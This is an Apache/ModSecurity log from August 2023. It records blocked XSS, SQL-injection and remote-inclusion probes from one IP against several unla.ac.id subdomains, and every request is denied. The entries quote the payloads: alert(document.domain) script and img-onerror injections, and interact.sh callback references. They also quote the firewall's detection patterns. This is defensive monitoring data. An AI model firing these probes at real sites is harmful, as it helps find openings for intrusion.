[Tue Aug 29 11:52:06.632795 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:page: javascript:alert(document.domain)//"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/iwc/idcStateError.iwc"] [unique_id "ZO15dsCo-f0AAAnTlLQAAAAA"]
[Tue Aug 29 11:52:06.633721 2023] [:error] [pid 2536] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:page: javascript:alert(document.domain)//"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "journal.unla.ac.id"] [uri "/iwc/idcStateError.iwc"] [unique_id "ZO15dsCo-f0AAAnoOpAAAAAf"]
[Tue Aug 29 11:52:06.643723 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:page: javascript:alert(document.domain)//"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/iwc/idcStateError.iwc"] [unique_id "ZO15dsCo-f0AAAn40y0AAAAW"]
[Tue Aug 29 11:52:07.568343 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:page: javascript:alert(document.domain)//"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/iwc/idcStateError.iwc"] [unique_id "ZO15d8Co-f0AAAoAkuYAAAAC"]
[Tue Aug 29 11:52:07.686107 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:to: /92874';alert(document.domain)//280"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/auth/login"] [unique_id "ZO15d8Co-f0AAAni@@cAAAAU"]
[Tue Aug 29 11:52:08.535627 2023] [:error] [pid 2562] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15eMCo-f0AAAoCWEEAAAAB"]
[Tue Aug 29 11:52:08.562990 2023] [:error] [pid 2562] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15eMCo-f0AAAoCWEIAAAAB"]
[Tue Aug 29 11:52:08.567346 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:fill. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:fill: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/checklist/images/checklist-icon.php"] [unique_id "ZO15eMCo-f0AAAn40zEAAAAW"]
[Tue Aug 29 11:52:08.595081 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15eMCo-f0AAAnd3EkAAAAI"]
[Tue Aug 29 11:52:08.616151 2023] [:error] [pid 2548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15eMCo-f0AAAn0Ga8AAAAa"]
[Tue Aug 29 11:52:08.669082 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:fill. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:fill: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/checklist/images/checklist-icon.php"] [unique_id "ZO15eMCo-f0AAAn40zMAAAAW"]
[Tue Aug 29 11:52:08.669442 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15eMCo-f0AAAhoHUEAAAAl"]
[Tue Aug 29 11:52:08.685348 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:fill. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:fill: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/checklist/images/checklist-icon.php"] [unique_id "ZO15eMCo-f0AAAnd3E0AAAAI"]
[Tue Aug 29 11:52:08.688620 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:fill. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:fill: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/checklist/images/checklist-icon.php"] [unique_id "ZO15eMCo-f0AAAn40zQAAAAW"]
[Tue Aug 29 11:52:08.696090 2023] [:error] [pid 2562] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:fill. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:fill: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/checklist/images/checklist-icon.php"] [unique_id "ZO15eMCo-f0AAAoCWEcAAAAB"]
[Tue Aug 29 11:52:09.601558 2023] [:error] [pid 2562] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: domain)>11 found within ARGS:email: test@test.com\\x22><img src=a onerror=alert(document.domain)>11"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/seo/seopanel/login.php"] [unique_id "ZO15ecCo-f0AAAoCWEgAAAAB"]
[Tue Aug 29 11:52:09.604640 2023] [:error] [pid 2548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: domain)>11 found within ARGS:email: test@test.com\\x22><img src=a onerror=alert(document.domain)>11"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/seo/seopanel/login.php"] [unique_id "ZO15ecCo-f0AAAn0GbMAAAAa"]
[Tue Aug 29 11:52:09.608223 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: domain)>11 found within ARGS:email: test@test.com\\x22><img src=a onerror=alert(document.domain)>11"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/seo/seopanel/login.php"] [unique_id "ZO15ecCo-f0AAAn40zUAAAAW"]
[Tue Aug 29 11:52:09.621082 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15ecCo-f0AAAfWOLkAAAAL"]
[Tue Aug 29 11:52:09.633658 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: domain)>11 found within ARGS:email: test@test.com\\x22><img src=a onerror=alert(document.domain)>11"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/seo/seopanel/login.php"] [unique_id "ZO15ecCo-f0AAAnIln0AAAAV"]
[Tue Aug 29 11:52:09.685327 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15ecCo-f0AAAm7nGAAAAAE"]
[Tue Aug 29 11:52:09.701269 2023] [:error] [pid 2548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:fill. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:fill: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/checklist/images/checklist-icon.php"] [unique_id "ZO15ecCo-f0AAAn0GbQAAAAa"]
[Tue Aug 29 11:52:09.712191 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15ecCo-f0AAAnjjL0AAAAX"]
[Tue Aug 29 11:52:09.712534 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15ecCo-f0AAAhoHUUAAAAl"]
[Tue Aug 29 11:52:09.713139 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15ecCo-f0AAAni@@wAAAAU"]
[Tue Aug 29 11:52:09.713149 2023] [:error] [pid 2562] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: domain)>11 found within ARGS:email: test@test.com\\x22><img src=a onerror=alert(document.domain)>11"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/seo/seopanel/login.php"] [unique_id "ZO15ecCo-f0AAAoCWEoAAAAB"]
[Tue Aug 29 11:52:10.592420 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: domain)>11 found within ARGS:email: test@test.com\\x22><img src=a onerror=alert(document.domain)>11"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/seo/seopanel/login.php"] [unique_id "ZO15esCo-f0AAAfWOLsAAAAL"]
